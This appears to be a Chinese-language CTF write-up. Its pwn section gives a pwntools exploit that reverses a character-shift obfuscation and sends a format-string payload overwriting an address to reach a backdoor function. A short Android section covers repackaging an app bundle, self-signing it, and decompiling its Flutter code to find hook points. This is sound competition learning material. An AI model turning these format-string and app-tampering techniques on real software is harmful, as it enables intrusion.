无题

pwn

Baby’s First Format

image.png Psjsus4提供的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def generate_input(desired_output):
    input_chars = []
    for idx, c in enumerate(desired_output):
        
        shift = idx % 7
        
        if c.islower():  
            original_ord = ord(c) - shift
            if original_ord < ord('a'):
                original_ord += 26  
            input_chars.append(chr(original_ord))
            
        elif c.isdigit():  
            original_ord = ord(c) - shift
            if original_ord < ord('0'):
                original_ord += 10  
            input_chars.append(chr(original_ord))
            
        else:  
            input_chars.append(c)
            
    return ''.join(input_chars)

用于绕过出题人自己编写的字符串转换混淆函数:sub_4012A8

后门函数: image.png

这道题没有运行在远程服务器,出题人说flag被硬编码在二进制文件中了。 image.png 最终队友Psjsus4拿下了一血!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/usr/bin/env python3

# module from 0xfun-Psjsus4

from pwn import *
import pwn
from sys import argv
from os import getcwd

e = ELF("./baby_fmt_patched")

context.binary = e
context.terminal = ["kitty", "@", "new-window", "--cwd", getcwd()]
context.gdbinit = "/pentest/pwndbg/gdbinit.py"

r: process = None

u64 = lambda d: pwn.u64(d.ljust(8, b"\0")[:8])
u32 = lambda d: pwn.u32(d.ljust(4, b"\0")[:4])
u16 = lambda d: pwn.u16(d.ljust(2, b"\0")[:2])
sla = lambda a, b: r.sendlineafter(a, b)
sa = lambda a, b: r.sendafter(a, b)
sl = lambda a: r.sendline(a)
s = lambda a: r.send(a)
recv = lambda: r.recv()
recvn = lambda a: r.recvn(a)
recvu = lambda a, b=False: r.recvuntil(a, b)

gdbscript = '''
    b main
    continue
'''

def conn():
    global r
    if len(argv) > 1:
        if argv[1] == "gdb":
            r = gdb.debug([e.path], gdbscript=gdbscript)
        else :
            ip, port = argv[1], argv[2]
            r = remote(ip, port)
    else:
        r = e.process()

def generate_input_bytes(desired_output: bytes) -> bytes:
    input_bytes = []
    for idx, c in enumerate(desired_output):
        shift = idx % 7
        
        # Reverse lowercase letters (a-z)
        if ord('a') <= c <= ord('z'):
            original = c - shift
            if original < ord('a'):
                original += 26  # Wrap around alphabet
            input_bytes.append(original)
        
        # Reverse digits (0-9)
        elif ord('0') <= c <= ord('9'):
            original = c - shift
            if original < ord('0'):
                original += 10  # Wrap around digits
            input_bytes.append(original)
        
        # Symbols/others remain unchanged
        else:
            input_bytes.append(c)
    
    return bytes(input_bytes)

def exploit():
    payload = b"funny123"
    payload += fmtstr_payload(7, {0x404028: 0x4015cd}, numbwritten=8)
    print(f"payload: {payload}")
    payload = generate_input_bytes(payload)
    payload = b"funny"+payload[5::]
    payload = payload.ljust(106, b"a")
    sl(payload)
    print("good luck pwning :)")


conn()
exploit()

# good luck pwning :)
r.interactive()

Android

Invincible

abb与apk的区别: image.png Releases · google/bundletool

1
java -jar bundletool-all-1.18.1.jar build-apks --bundle="invincible.aab" --output=output.apks --mode=universal

image.png 需要找到签名。 但尝试在MT管理器直接自签名,发现能安装该app并且进去了: image.png 按照它说的翻转查看提示,然而并没有提示: image.png 通过blutter项目已经成功反编译出该flutter,同时还能够用结果中的脚本,通过ida-python来恢复arm64-v8a\libapp.so中的大部分符号信息。 接着关键问题就是分析出哪个函数是可以有hook的机会。

Secure Chat Bounty